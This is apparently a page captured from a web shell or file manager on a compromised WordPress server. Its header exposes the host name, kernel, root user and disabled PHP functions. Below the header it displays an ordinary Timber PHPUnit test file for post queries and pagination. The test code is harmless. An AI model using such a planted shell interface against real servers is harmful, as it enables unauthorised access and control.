HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux wordpress-ubuntu-s-2vcpu-4gb-fra1-01 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/delta/wp-content/themes/delta/vendor/timber/timber/tests/test-timber-post-collection.php
<?php

class TestTimberPostQuery extends Timber_UnitTestCase {

	function set_up() {
		global $wpdb;
		$wpdb->query("TRUNCATE TABLE $wpdb->posts");
		$wpdb->query("ALTER TABLE $wpdb->posts AUTO_INCREMENT = 1");
		parent::set_up();
	}

	function testBackwards() {
		$pc = new TimberPostsCollection();
		$pc = new Timber\PostsCollection();
	}

	function testBasicCollection() {
		$pids = self::factory()->post->create_many(10);
		$pc = new Timber\PostQuery('post_type=post&numberposts=6');
		$this->assertEquals(6, count($pc));
	}

	function testCollectionWithWP_PostArray() {
		$cat = self::factory()->term->create(array('name' => 'Things', 'taxonomy' => 'category'));
		$pids = self::factory()->post->create_many(4, array('category' => $cat));
		$posts = get_posts( array('post_category' => array($cat), 'posts_per_page' => 3) );
		$pc = new Timber\PostQuery($posts);
		$pagination = $pc->pagination();
		$this->assertNull($pagination);
	}

	function testPaginationOnLaterPage() {
		$this->setPermalinkStructure('/%postname%/');
		register_post_type( 'portfolio' );
		$pids = self::factory()->post->create_many( 55, array( 'post_type' => 'portfolio' ) );
		$this->go_to( home_url( '/portfolio/page/3' ) );
		query_posts('post_type=portfolio&paged=3');
		$posts = new Timber\PostQuery();
		$pagination = $posts->pagination();
		$this->assertEquals(6, count($pagination->pages));
	}

	function testBasicCollectionWithPagination() {
		$pids = self::factory()->post->create_many(130);
		$page = self::factory()->post->create(array('post_title' => 'Test', 'post_type' => 'page'));
		$this->go_to('/');
		query_posts(array('post_type=post'));
		$pc = new Timber\PostQuery('post_type=post');
		$str = Timber::compile('assets/collection-pagination.twig', array('posts' => $pc));
		$str = preg_replace('/\s+/', ' ', $str);
		$this->assertEquals('<h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <div class="l--pagination"> <div class="pagination-inner"> <div class="pagination-previous"> <span class="pagination-previous-link pagination-disabled">Previous</span> </div> <div class="pagination-pages"> <ul class="pagination-pages-list"> <li class="pagination-list-item pagination-page">1</li> <li class="pagination-list-item pagination-seperator">of</li> <li class="pagination-list-item pagination-page">13</li> </ul> </div> <div class="pagination-next"> <a href="http://example.org/?paged=2" class="pagination-next-link ">Next</a> </div> </div> </div>', trim($str));
	}

	function IgnoretestBasicCollectionWithPaginationAndBlankQuery() {

		$pids = self::factory()->post->create_many(130);
		$this->go_to('/');
		$pc = new Timber\PostQuery();
		$str = Timber::compile('assets/collection-pagination.twig', array('posts' => $pc));
		$str = preg_replace('/\s+/', ' ', $str);
		$this->assertEquals('<h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <h1>POST</h1> <div class="l--pagination"> <div class="pagination-inner"> <div class="pagination-previous"> <span class="pagination-previous-link pagination-disabled">Previous</span> </div> <div class="pagination-pages"> <ul class="pagination-pages-list"> <li class="pagination-list-item pagination-page">1</li> <li class="pagination-list-item pagination-seperator">of</li> <li class="pagination-list-item pagination-page">13</li> </ul> </div> <div class="pagination-next"> <a href="http://example.org/?paged=2" class="pagination-next-link ">Next</a> </div> </div> </div>', trim($str));
	}

	function testFoundPostsInQuery() {
		self::factory()->post->create_many( 20 );

		$query = new Timber\PostQuery( [
			'post_type' => 'post',
		] );

		$this->assertCount( 10, $query );
		$this->assertEquals( 20, $query->found_posts );
	}

	function testFoundPostsInQueryWithNoFoundRows() {
		self::factory()->post->create_many( 20 );

		$query = new Timber\PostQuery( [
			'post_type'     => 'post',
			'no_found_rows' => true,
		] );

		$this->assertCount( 10, $query );
		$this->assertEquals( 0, $query->found_posts );
	}

	function testFoundPostsInCollection() {
		self::factory()->post->create_many( 20 );

		$posts = ( new Timber\PostQuery( [
			'post_type' => 'post',
		] ) )->get_posts();

		$collection = new Timber\PostQuery( $posts );

		$this->assertCount( 10, $collection );
		$this->assertEquals( null, $collection->found_posts );
	}

	function testFoundPostsInCollectionWithNoFoundRows() {
		self::factory()->post->create_many( 20 );

		$posts = ( new Timber\PostQuery( [
			'post_type'     => 'post',
			'no_found_rows' => true,
		] ) )->get_posts();

		$collection = new Timber\PostQuery( $posts );

		$this->assertCount( 10, $collection );
		$this->assertEquals( null, $collection->found_posts );
	}
}